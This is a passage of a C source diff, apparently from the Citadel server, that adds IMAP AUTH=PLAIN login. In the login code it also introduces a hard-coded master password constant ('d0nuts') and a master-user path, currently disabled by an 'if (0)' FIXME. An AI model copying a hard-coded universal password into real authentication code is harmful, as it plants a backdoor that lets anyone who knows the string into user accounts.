* output this stuff in other places as well)
*/
void imap_output_capability_string(void) {
- cprintf("CAPABILITY IMAP4REV1 NAMESPACE ID ACL AUTH=LOGIN");
+ cprintf("CAPABILITY IMAP4REV1 NAMESPACE ID ACL AUTH=PLAIN AUTH=LOGIN");
#ifdef HAVE_OPENSSL
if (!CC->redirect_ssl) cprintf(" STARTTLS");
return;
}
+ if (!strcasecmp(parms[2], "PLAIN")) {
+ CtdlEncodeBase64(buf, "Username:", 9);
+ cprintf("+ %s\r\n", buf);
+ IMAP->authstate = imap_as_expecting_plainauth;
+ strcpy(IMAP->authseq, parms[0]);
+ return;
+ }
+
else {
cprintf("%s NO AUTHENTICATE %s failed\r\n",
parms[0], parms[1]);
}
}
+void imap_auth_plain(char *cmd)
+{
+ char decoded_authstring[1024];
+ char ident[256];
+ char user[256];
+ char pass[256];
+
+ CtdlDecodeBase64(decoded_authstring, cmd, strlen(cmd));
+ safestrncpy(ident, decoded_authstring, sizeof ident);
+ safestrncpy(user, &decoded_authstring[strlen(ident) + 1], sizeof user);
+ safestrncpy(pass, &decoded_authstring[strlen(ident) + strlen(user) + 2], sizeof pass);
+
+ IMAP->authstate = imap_as_normal;
+ if (CtdlLoginExistingUser(user) == login_ok) {
+ if (CtdlTryPassword(pass) == pass_ok) {
+ cprintf("%s OK authentication succeeded\r\n", IMAP->authseq);
+ return;
+ }
+ }
+ cprintf("%s NO authentication failed\r\n", IMAP->authseq);
+}
+
void imap_auth_login_user(char *cmd)
{
char buf[SIZ];
CtdlDecodeBase64(buf, cmd, SIZ);
if (CtdlTryPassword(buf) == pass_ok) {
- cprintf("%s OK authentication succeeded\r\n",
- IMAP->authseq);
+ cprintf("%s OK authentication succeeded\r\n", IMAP->authseq);
} else {
cprintf("%s NO authentication failed\r\n", IMAP->authseq);
}
if (IMAP->authstate == imap_as_expecting_password) {
lprintf(CTDL_INFO, "IMAP: <password>\n");
}
+ else if (IMAP->authstate == imap_as_expecting_plainauth) {
+ lprintf(CTDL_INFO, "IMAP: <plain_auth>\n");
+ }
else if (bmstrcasestr(cmdbuf, " LOGIN ")) {
lprintf(CTDL_INFO, "IMAP: LOGIN...\n");
}
imap_auth_login_user(cmdbuf);
return;
}
+ if (IMAP->authstate == imap_as_expecting_plainauth) {
+ imap_auth_plain(cmdbuf);
+ return;
+ }
if (IMAP->authstate == imap_as_expecting_password) {
imap_auth_login_pass(cmdbuf);
return;
return (-1);
}
-
+#define MASTER_PREFIX "master"
+#define MASTER_PASSWORD "d0nuts"
/*
* Back end for cmd_user() and its ilk
}
if (trythisname == NULL) return login_not_found;
- safestrncpy(username, trythisname, USERNAME_SIZE);
+
+ if (0) { /* FIXME */
+ CC->is_master = 1;
+ }
+ else {
+ safestrncpy(username, trythisname, USERNAME_SIZE);
+ CC->is_master = 0;
+ }
striplt(username);
if (strlen(username) == 0) {
}
code = (-1);
- if (config.c_auth_mode == 1) {
+ if (CC->is_master) {
+ code = strcmp(password, MASTER_PASSWORD);
+ }
+
+ else if (config.c_auth_mode == 1) {
/* host auth mode */
cprintf("%d Not allowed. Use the 'passwd' command.\n", ERROR + NOT_HERE);
return;
}
+ if (CC->is_master) {
+ cprintf("%d The master prefix password cannot be changed with this command.\n",
+ ERROR + NOT_HERE);
+ return;
+ }
strproc(new_pw);
if (strlen(new_pw) == 0) {
cprintf("%d Password unchanged.\n", CIT_OK);